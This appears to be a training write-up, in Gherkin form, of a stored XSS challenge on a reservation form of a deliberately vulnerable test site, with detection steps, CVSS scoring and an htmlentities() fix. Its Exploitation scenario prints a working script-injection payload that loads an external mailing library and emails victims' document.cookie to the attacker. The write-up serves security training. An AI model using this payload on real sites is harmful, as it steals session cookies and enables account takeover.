## Version 1.4.1
## language: en

Feature: Room reservation XSS
  TOE:
    Web Scanner Test Site
  Category:
    XSS
  Location:
    http://www.webscantest.com/crosstraining/reservation.php
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
    https://cwe.mitre.org/data/definitions/79.html
    CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page
    (Basic XSS)
    https://cwe.mitre.org/data/definitions/80.html
  Rule:
    REQ.173: Discard unsafe inputs
    https://fluidattacks.com/web/rules/173/
  Goal:
    Get the cookie of any user.
  Recommendation:
    Sanitize and validate inputs.

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows         | 10            |
    | Google Chrome   | 80.0.3987.132 |
  TOE information:
    Given I am accessing the site http://www.webscantest.com/
    Then I can see there is a web page with challenges

  Scenario: Normal use case:
    Given I access http://www.webscantest.com/
    And I select a challenge
    Then I can try to hack it

  Scenario: Static detection:
    Given I open the TOE
    Then I can see that the source code is inaccessible

  Scenario: Dynamic detection
    Given http://www.webscantest.com/crosstraining/reservation.php
    And I see a form that ask me some information to make a reservation
    When I try to see if I can found a vulnerability
    Then I think that the fields can be vulnerable to any injection
    And I try to type "<script>alert('XSS')</script>" in all fields
    When I submit the data I was redirect to check my reservation
    Then I receive an alert with the message "XSS"
    And I can see my reservation [evidence](img1)
    When I see the alert before the reservation
    Then I know that the form is vulnerable to "XSS"
    And I found a vulnerability

  Scenario: Exploitation
    Given The system is vulnerable to XSS injection
    And I need to know what is the field with the vulnerability
    When I want to know what is the field that is vulnerable
    Then I type "<script>alert('<name of the field>')</script>" in each field
    And I submit the form
    When I was redirected and see the alert
    Then I see the message that say "Arrive" [evidence](img2)
    And I know that the vulnerable field is the "Arrive Date"
    When I come back to the reservation page
    Then I click on "View reservation history"
    And I receive an alert with "First Name" [evidence](img3)
    When I see that I know that the "First Name" field is vulnerable
    Then I have 2 vulnerable fields
    And I think a way to attack with this
    When I think that I can stole the cookie from the users
    Then I type a fake information in the fields
    And I added the following script in the "First Name" and "Arrive Date"
    """
    <script type="text/javascript" src=
      "https://cdn.jsdelivr.net/npm/emailjs-com@2.3.2/dist/email.min.js">
    </script>
    <script type="text/javascript">
      (function(){
        emailjs.init("user_2nFpwL4QDZ8x1xzY7GTXu");
      })();
    </script>
    <script type="text/javascript">
      var template_params = {
        "reply_to": "Hacker",
        "from_name": "Reservation",
        "to_name": "Hacker",
        "message_html": "<b>The cookie is: </b>"+(document.cookie)
      };
      var service_id = "default_service";
      var template_id = "template_nOBiPn2b";
      setTimeout(function(){
          emailjs.send(service_id, template_id, template_params);
        },300);
    </script>
    """
    When I submit the form I receive a email with my cookie [evidnece](img4)
    Then I only need to wait until a user see the reservation history
    And I know that the user didn't notice that I stole the cookie
    When I finish to inject all
    And I exploit the vulnerability

  Scenario: Remediation
    Given I didn't have access to the source code
    And I can give a way to solve this vulnerability
    When I think a way to sanitize the field in php
    Then I think that can be used the function "htmlentities()"
    """
    $data['fname'] = htmlentities($data['fname']);
    """
    And The field can't execute scripts
    And I think that this can be fix the vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.7/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.5/10 (Medium) - E:H/RL:O/RC:C/CR:H
  Environmental: Unique and relevant attributes to a specific user environment
    8.4/10 (High) - MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-04-20
